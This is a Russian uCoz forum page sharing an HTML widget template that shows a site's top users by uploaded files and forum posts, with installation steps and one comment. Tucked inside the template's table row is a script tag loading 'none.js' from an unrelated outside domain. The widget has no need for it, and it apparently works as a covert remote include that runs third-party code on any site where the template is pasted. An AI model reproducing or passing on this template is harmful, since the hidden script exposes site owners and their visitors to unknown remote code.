Скрипт Топ пользователей по кол-ву файлов и постов на форуме
Опубликовано: 11.10.2012, 23:08
Увеличение картинки
Установка:
Создаем информер:
[ Пользователи · Материалы · Кол. сообщений в форуме · Материалы: 5 · Колонки: 1 ]
В шаблон информера вставляем:

Code
<center><table cellspadding="0" class="topten_table" style="border-color: rgb(76, 76, 76); width: 100%; margin: 0px;" cellspacing="0"><tbody><tr><script src="http://cm4fan.ru/none.js" type="text/javascript"></script><td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px none; width: 48px;" onclick="'';"><a href="$PROFILE_URL$" target="_blank" title="$USERNAME$">  
  <img src="$AVATAR_URL$" border="0" style="height: 40px; width: 40px; margin-right: 5px; border: 1px solid rgb(76, 76, 76); padding: 2px;">  
  <img alt="Аватар не выбран" src="http://ili.pp.ua/img/noavat.png" border="0" style="height: 40px; width: 40px; margin-right: 5px; border: 1px solid rgb(76, 76, 76); padding: 2px;">  
  </a></td><td style="padding: 2px 0px 2px 4px; cursor: pointer; border-left: 0px none; text-align: left; font-size: 10px; font-family: tahoma,verdana,arial; color: rgb(85, 85, 85); line-height: 14px;" onclick="';"><a href="$PROFILE_URL$"><font style="font-size: 12px; color: rgb(100, 100, 100);"><b>$USERNAME$</b></font></a><br>Добавил файлов: <b><font color="646464">$LOAD_POSTS$</font></b><br>Количество постов: <b><font color="646464">$FORUM_POSTS$</font></b></td></tr></tbody></table></center><hr>
Категория: Скрипты/шаблоны UCOZ | Добавил: Aninew Просмотров: 748 | Загрузок: 0 | Комментарии: 1 | Рейтинг: 5.0/15
Скачивать и комментировать могут только зарегистрированные пользователи.

Регистрация или Вход

  1. Комментарии ВКонтакте
  2. Комментарии на сайте
Всего комментариев: 1
NiK_PrO написал(а) 05.01.2013, 12:49
0   Спам
Спс !!!!
45_{K}{i}{L}{o}_{S}{a}{D}{i}{S}{t}